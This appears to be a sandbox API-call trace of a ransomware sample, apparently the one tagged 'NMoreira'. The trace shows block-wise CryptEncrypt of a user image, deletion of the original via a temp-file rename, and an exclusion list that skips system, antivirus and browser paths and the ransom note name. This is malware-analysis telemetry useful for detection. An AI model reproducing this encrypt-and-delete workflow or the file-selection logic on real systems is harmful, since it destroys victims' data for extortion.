ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.839] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.839] GetLastError () returned 0x0 [0164.839] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.839] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.839] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.839] GetLastError () returned 0x0 [0164.839] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.839] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.839] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.840] GetLastError () returned 0x0 [0164.840] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.840] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.840] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.840] GetLastError () returned 0x0 [0164.840] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.840] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.840] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.840] GetLastError () returned 0x0 [0164.840] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.840] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.840] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.840] GetLastError () returned 0x0 [0164.840] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.840] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.840] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.840] GetLastError () returned 0x0 [0164.840] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.840] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.840] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.840] GetLastError () returned 0x0 [0164.840] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.840] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.840] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.840] GetLastError () returned 0x0 [0164.840] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.841] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.841] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.841] GetLastError () returned 0x0 [0164.841] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.841] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.841] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.841] GetLastError () returned 0x0 [0164.841] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.841] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.841] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.841] GetLastError () returned 0x0 [0164.841] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.841] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.841] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.841] GetLastError () returned 0x0 [0164.841] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.841] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.841] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.841] GetLastError () returned 0x0 [0164.841] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.841] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.841] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.841] GetLastError () returned 0x0 [0164.841] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.842] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.842] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.842] GetLastError () returned 0x0 [0164.842] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.842] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.842] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.842] GetLastError () returned 0x0 [0164.842] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.842] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0xfb, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0xfb, lpOverlapped=0x0) returned 1 [0164.842] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xfb, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.842] GetLastError () returned 0x0 [0164.842] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.842] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.842] WriteFile (in: hFile=0x6a4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg")) returned 0x20 [0164.842] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg", dwFileAttributes=0x20) returned 0 [0164.842] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned 1 [0164.843] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg")) returned 0 [0164.843] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" [0164.843] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.843] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF75D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf75d.tmp")) returned 0xf75d [0164.844] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF75D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf75d.tmp"), dwFlags=0x1) returned 0 [0164.844] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF75D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf75d.tmp")) returned 1 [0164.844] CryptDestroyKey (hKey=0x9ad478) returned 1 [0164.844] wcslen (_String="OK") returned 0x2 [0164.844] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.844] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.844] CryptDestroyKey (hKey=0x9ad378) returned 1 [0164.844] CryptDestroyHash (hHash=0x9ad578) returned 1 [0164.844] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0164.845] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*NMCRYPT") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*Recovers your files.html") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*.exe") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*.dll") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*.lnk") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*.bat") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*.ini") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*.msi") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*.scf") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*pagefile.sys*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*AppData*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\winrar\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\java\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\windows\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\ESET\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\AVG\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*Atheros*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*Realtek*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*bootmgr*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*boot*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*boot*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*IO.SYS*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*ntldr*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*chrome*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*opera*") returned 0 [0164.845] PathMatchSpecW (pszFile="Pine_Lumber.jpg", pszSpec="*firefox*") returned 0 [0164.845] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg", pszSpec="*") returned 1 [0164.845] strlen (_Str="NMoreira") returned 0x8 [0164.845] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.845] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.845] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.845] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.845] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 